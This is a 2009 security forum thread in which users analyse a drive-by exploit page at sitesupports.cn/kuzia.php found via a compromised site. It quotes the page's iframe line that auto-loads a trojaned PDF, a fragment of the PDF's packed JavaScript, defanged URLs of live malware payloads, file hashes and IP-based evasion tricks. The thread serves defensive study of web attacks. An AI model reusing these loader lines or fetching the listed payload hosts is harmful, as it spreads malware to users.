·Frontier FiberOp..
|
Threat Detected: sitesupports.cn.kuzia.php a.php |
While browsing darkroastedblend(dot)com a friend of mine received a "threat detected" warning from "Web Shield". The inserted picture shows what he saw. I could find no information regarding "kuzia" or any details regarding the alleged JavaScript obfuscation. Does anyone know anything about what this is? Thanks, Ender |
|
SnowyLock him up!!! Premium Member join:2003-04-05 Kailua, HI |
Snowy
Premium Member
2009-Apr-5 6:34 pm
I can't answer your question directly but in light of this similar thread » Website owned? Or false positive?can anyone say if this sort of thing could be mitigated by placing the entire .cn domain in the host file? |
|
·Frontier FiberOp..
|
Thanks for the response. That was quite an interesting thread.
No doubt editing the hosts file would prevent any unwanted offsite image fills from *.cn or the execution of offsite scripts, but in this case the sitesupports(dot)cn website appears to be an "Apache HTTP Server Test Page" which seems unremarkable and without scripts of any kind. The only embedded links are to apache(dot)org and centos(dot)org and one informational link to internic(dot)net. Seems weird that his "Web Shield" protection freaked out over that.
In viewing the source I could not find anything embedded on the darkroastedblend site that looked threatening, but I am certainly not a security expert. Then again, I don't browse with IE or with javascript enabled or with active x enabled...
:O) |
|
|
Ender3rd |
to Snowy
said by Snowy:can anyone say if this sort of thing could be mitigated by placing the entire .cn domain in the host file? I looked into your idea of blocking a top level domain with the hosts file and found that the hosts file will not accept wildcards. From what I read, it can be handled at the DNS level, but I could find no easy method for dealing with this as an end user. Does anyone have any suggestions? I would not miss .cn at all if I could block it here. |
|
VikingBobGo Jets Go! Premium Member join:2004-06-05 MB Canada |
OpenDNS will block TLDs. You have to sign up, though. In the settings, add ".cn" (without quotes) in the domains to block list. No * for a wildcard needed. |
|
3 edits |
to Ender3rd
sitesupports.cn certainly does contain exploit code. The root URL may be a default placeholder page, but the URL AVG complained about (/kuzia.php) does try to launch a trojaned PDF: document.write('<iframe src="cache/readme.pdf"></iframe>');
(it also attempts to load a Flash file, but that's not present on the server, currently.) I couldn't find any link to this attack on darkroastedblend.com. Either it's been fixed for now, or it doesn't always show up, or the compromise was in a random advert shown by one of the site's ad networks. As for blocking .cn, it may help as a temporary measure if you're sure you'll never need to look at any Chinese sites. it's far from watertight of course; in particular many of the current round of Chinese sploits are being referenced by direct IP address instead of hostname. |
|
mysec Premium Member join:2005-11-29 1 edit
1 recommendation |
mysec
Premium Member
2009-Apr-6 7:10 pm
Very interesting site to study. Different things happen depending on the browser. Using IE6 unpatched on Win2K, several exploits attempt to run, including MS06-014 (MDAC):
Kaspersky identifies load.exe as Trojan.Win32.Inject.rlh. Also MS08-041 (Snapshot Viewer) but I don't have MSAccess installed, so the exploit attempts to find my Office Setup Disk and use an installer (msi*.tmp):
Note that these are old exploits already patched, yet must still be effective or they wouldn't continue be used. Some of the obfuscated page code. The first 'setAttribute' is for the MS06-014 exploit, and the 'snapshot' code is below.
That code did not load when I accessed the page using Opera. According to some analysts, garbling the code makes it more difficult for AV to identify the page as malware code. The PDF file exploit would not execute on my old version 6 of Acrobat Reader. The file is identified by Sophos as Troj/PDFJs-LType: Trojan Another "feature" of this site is the evasive techniques used to avoid multiple connections to the site by the same IP address. The second time I connected brought up a blank page with this code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html;
charset=windows-1251"></HEAD>
<BODY></BODY></HTML>
This technique was analyzed a couple of years ago in this article: Report Reveals New Genre of Evasive Attacks » www.finjan.com/Pressrele ··· 30&lan=3 In order to minimize the malicious code's window of exposure, evasive attacks keep track of the actual IP addresses of visitors to a particular website or web page. Using this information, the attackers restrict exposure to the malicious code to a single view from each unique IP address. This means that the second time a given IP address tries to access the malicious page, a benign page will be automatically displayed in its place. All traces of the initial malicious page completely disappear.
"Evasive attack techniques where malicious code is controlled per IP address, country of origin or number of visits provide hackers with the ability to minimize the malicious codes exposure, thereby reducing the likelihood of detection. Moreover, evasive attacks can identify the IP addresses of crawlers used by URL filtering, reputation services and search engines, replying to these engines with legitimate content and increasing the chances of mistakenly being classified by them as a legitimate category," said Yuval Ben-Itzhak, CTO, Finjan. "The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected."
Hacking for Dollar$ - The Financial Affiliations Behind Modern Website Attacks
Driven by strong financial incentives and using widely available malicious code software packages, "affiliations" are being created that promote infections using a "hosted" model for the malicious code. This applies to the current exploit: In this scheme, the malicious code is usually located on a dedicated malicious code server (or a site that has been hacked to host the malicious code), [sitesupports.cn.kuzia]
while the participants in the affiliation insert a reference to the malicious code in various websites. [darkroastedblend.com] [my insertions] The website owners are paid according to the number of infected visitors to the site. Finjans findings attest to the growing magnitude of these affiliation networks, which have been used to compromise highly popular websites and even government domains. This was written in 2007. Not much has changed! EDIT: correct a statement ---- rich |
|
therube join:2004-11-11 Randallstown, MD 4 edits |
to Snowy
Similar indeed. Look what Metabolic posted: quote: Hi, today i met with this page and i suggest there is two file. One use an Adobe Acrobat reader bug to install malware to the computer the other is a Flash virus This is the pdf: hxxp://liteautorepair.cn/cache/readme.pdf This is the swf: hxxp://liteautorepair.cn/cache/flash.swf
The page checks that witch plugin is installed ...
Different domains doing the hosting, but the same (named) payload. (At the least) readme.pdf from liteautorepair is still available. Contains JavaScript code. /JS (eval\(function\(p,a,c,k,e,d\){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)} ...
Points to MCRC Blog - 2009 - PACKED - The Elegant way to serve malware (which may have been linked in another thread here, or at least I remember the name finjan). (LOL. It was this thread that I read "finjan". Like mysec's post above.) (The kuzia pdf/swf files were not available to me. Either not there or being [IP?] blocked?) Also worth review the first linked thread including bobince's replies. Also good IMO that at least some A/V's (AVG in the first instance) are pointing out potential problems with sites containing malware. |
|
|
to mysec
quote: "document.write" is not supported by non-IE browsers.
On the contrary, it's an original JavaScript 1.0 feature, going back to Netscape 2.0 days and supported everywhere. The page does use browser-sniffing (very common these days), but the version I got was targeted at other browsers via plugins. |
|
·Frontier FiberOp..
|
I appreciate all the information given in the thread. Would it be fair to say that [darkroastedblend] was a willing partner in this exploit, or is it more likely that they were the victim of an exploit that linked them to the sitesupports.cn scripts?
Also, when I view [sitesupports.cn] all I see is an "Apache 2 Test Page" that appears to be devoid of any script language in the source. I see no page at all if I append that with kuzia.php (viewing with firefox - scripts disabled) so is it fair to say that this particular exploit has been removed?
Thanks,
Ender |
|
your moderator at work
hidden :
|
mysec Premium Member join:2005-11-29 |
to bobince
Re: Threat Detected: sitesupports.cn.kuzia.phpsaid by bobince:quote: "document.write" is not supported by non-IE browsers.
On the contrary, it's an original JavaScript 1.0 feature, going back to Netscape 2.0 days and supported everywhere. Thanks for the correction. I noticed my mistake last evening in another thread when I got the download using Opera, and intended to correct it here, which I just did. ---- rich |
|
mysec |
to Ender3rd
said by Ender3rd:I appreciate all the information given in the thread. Would it be fair to say that [darkroastedblend] was a willing partner in this exploit, or is it more likely that they were the victim of an exploit that linked them to the sitesupports.cn scripts? Probably the latter, since bobince noted that the script has been removed. Also, when I view [sitesupports.cn] all I see is an "Apache 2 Test Page" that appears to be devoid of any script language in the source. I see no page at all if I append that with kuzia.php (viewing with firefox - scripts disabled) so is it fair to say that this particular exploit has been removed? Remember to disconnect/reconnect between tries. The page with .../kuzia.php still loads here in both Opera and IE6, with differences in the code as I noted previously. ---- rich |
|
therube join:2004-11-11 Randallstown, MD |
to Ender3rd
quote: when I view [sitesupports.cn] all I see is an "Apache 2 Test Page"
Correct. Cause in all likelihood that is all that is there. Now if you were to use h-ttp://sitesupports.cn/kuzia.php/, you would see the exploit page (at least the start of, & assuming your IP hasn't been blocked). Wonder if view-source: (in Mozilla browsers) would avoid the IP block? view-source:http://sitesupports.cn/kuzia.php/
|
|
mvdu Premium Member join:2003-07-28 Collegeville, PA |
to Ender3rd
I just get a blank page when I go there now, with AntiVir not alerting. Only the first time I went to hxxp://sitesupports.cn/kuzia.php/ did I get the exploit page that AntiVir alerted on. |
|
|
to mysec
Thanks again for the patient analysis. This was the first time I have seen a disappearing exploit after an initial page load. Very clever and evasive indeed.
Regards,
Ender |
|
|
Marrach to Ender3rd
Anon
2009-Apr-7 11:57 pm
to Ender3rd
Just a little extra info-- for Firefox 2x Users-- You may find that Firefox may have had a configuration file rewritten by this website/trojan. I only noticed if After my Kaspersky woke up and blocked the download attempt of the actual Trojan, but Firefox had already been hijacked to attempt the download when it restarted. By then, Kaspersky blocked it-- but the browser kept trying to download. So when I tried to close Firefox, I got a window asking if I wanted to "Cancel a Download"-- but I never saw the download window in the first place, and when I opened the Download window it was empty-- Firefox was trying a download the file-- and has been instructed NOT to let you see it. You've got to get rid of a file in the Configuration that instructs Firefox to tap into sitesupports.cn when you start it up. I got rid of it by overwriting the Application Data files for Mozilla in "Documents and Settings". Sorry I don't know which one it was. I just overwrote from my last Clean Ghost. I don't know if the same thing can happen with FireFox 3x. That's my 2 cents. |
|
mysec Premium Member join:2005-11-29 |
to therube
said by therube:Similar indeed. Look what Metabolic posted: quote: This is the pdf: hxxp://liteautorepair.cn/cache/readme.pdf
Different domains doing the hosting, but the same (named) payload. But the PDF files are different: sitesupports.cn MD5: 334a732f5d026b20eb24b860b3723833 FileSize: 9k Sophos: Troj/PDFJs-L Opening in Acrobat Reader:
liteautorepair.cn MD5: d085506ba97322a0896580eb5a7beefb FileSize: 16k BitDefender: Exploit.PDF-JS.Gen Opening in Acrobat Reader:
The PDF-JS trojans have been around awhile. Here is an analysis of an early one: Analyzing a malicious pdf - Troj/PDFJs-A » realsecurity.wordpress.c ··· pdfjs-a/Now that we have the shellcode we can very easily find out what it's doing. We now have a .exe as output. hxxp://aolpound.com/z9QCkGo7/exe.php I don't know which versions and which vulnerabilites in the Acrobat Reader these PDF files exploit, but I did not get an alert to a download, as I did from the IE exploits as shown in a previous post. Nonetheless, I've never believed that an application should be depended upon to be a defense against malware executables, and that some type of execution prevention should be in place just in case. Is your browser configured to open documents on the web in the browser? This can present a problem with remote code execution exploits, such as this. I posted these screenshots in another thread, but are applicable here. If configured to open in the browser, as I have with IE6, the PDF file will load into the i-frame and run. This code is still active. No click required: document.write('<iframe src="cache/readme.pdf"></iframe>');
In Opera I configure to prompt for a download:
In my view, this is the way that documents on the web should be treated. This way, the user is alerted if encountering something she/he didn't go looking for, rather than getting an automatic download.
---- rich
|
|